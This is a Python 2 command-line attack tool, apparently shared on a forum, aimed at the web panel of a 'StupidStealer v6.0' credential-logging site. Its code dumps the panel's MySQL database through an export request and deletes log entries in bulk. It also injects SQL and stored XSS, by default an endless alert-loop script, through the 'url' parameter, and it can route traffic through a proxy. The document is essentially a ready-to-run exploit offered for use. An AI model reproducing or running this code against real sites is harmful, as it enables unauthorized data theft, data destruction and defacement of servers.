Code:
# autor: EBFE
# mail: ebfe@inbox.ru
# require: argparse module -> python 2.7
# for python < 2.7: run "easy_install argparse"
import argparse, sys, urllib, random, time
a_z = [chr(x) for x in range(ord('a'),ord('z')+1)]
A_Z = [x.upper() for x in a_z]
chars = list("0123456789") + A_Z + a_z
def get_args():
parser = argparse.ArgumentParser(description = 'EBFE\'s one command line '\
'\'StupidStealer v6.0\' H4ckT00l :)')
parser.add_argument('URL', type = str, help = 'target URL, e.g '\
'"http://l337url.cc"')
parser.add_argument('-d', '--dump', metavar = 'file', nargs = '?',
type=argparse.FileType('a'), const = sys.stdout,
help = 'dump MySQL database to file'\
' (default: <stdout>)')
parser.add_argument('-del', '--delete', metavar = ('from', 'to'),
type = int, nargs = 2,
help = 'delete data entries from MySQL database\n\n'\
'from = startvalue, to = endvalue')
parser.add_argument('-i', '--inject', metavar = 'XSS Code', nargs = '?',
type = str, help = 'inject some HTML code, '\
'max. length: 255 (default: %(const)s)',
const = '<script type="text/javascript">while(1) '\
'alert(\"u w3r3 h4x0r3d by m3 :)\")</script>')
parser.add_argument('-p', '--proxy', type = str,
metavar = ('http://proxy.example.com:8080'),
help = 'use a http proxy')
return parser.parse_args()
def rand_string(minlen, maxlen):
result = []
for i in range(random.randrange(minlen, maxlen)):
result.append(random.choice(chars))
return "".join(result)
def rand_ip():
return ".".join([str(random.randrange(255)) for i in [1,2,3,4]])
def rand_date():
return time.strftime("%d:%m:%Y",time.gmtime(time.time()
+ random.randrange(-60*60*24, 60*60*24)))
# protocol, url, user, pass, pcname, date, ip)
def inject():
injection = url = args.inject +\
"\', %s, %s, %s, %s, %s);-- '".replace("%s", "\'%s\'") %\
(rand_string(3,10), rand_string(5, 12),
rand_string(5, 10), rand_date(), rand_ip())
url = args.URL + '?' + urllib.urlencode((('action', 'add'),
('protocol', 'msn'),('url', injection), ('user', rand_string(3, 10)),
('pass', rand_string(5, 12)), ('pcname', rand_string(5, 10)),
('date', rand_date())))
page = urllib.urlopen(url, args.proxy)
print "HTTP %d \nContent-Length: %d" % (page.getcode(), len(page.read()))
page.close()
def dump():
# POST: export_all=Export+All+Logs
print "dumping '%s' DB to: '%s'" % (args.URL, args.dump.name)
post = urllib.urlencode({'export_all': 'Export All Logs'})
page = urllib.urlopen(args.URL, post, args.proxy)
print "HTTP %d" % page.getcode()
args.dump.write(page.read())
page.close()
def delete(start, end):
#POST: sel[]=1&sel[]=2 ... &sel[]=100&delete=Delete
dels = [('delete','Delete')]
for i in xrange(start, end):
dels.append(('sel[]', i))
print "deleting from %d to %d ..." % (start, end)
page = urllib.urlopen(args.URL, urllib.urlencode(dels), args.proxy)
print "HTTP %d" % page.getcode()
page.close()
def main():
args.URL = args.URL + '/index.php'
if args.proxy:
print "proxy:", args.proxy
args.proxy = {"http:":args.proxy}
if args.dump:
dump()
args.dump.close()
if args.delete:
for i in xrange(args.delete[0], args.delete[1], 100):
delete(i, i + 100)
if args.inject:
args.inject = args.inject.replace("\'", "\"")
print "inject XSS:\n%s\nto:'%s'" %(args.inject, args.URL)
inject()
args = get_args()
main()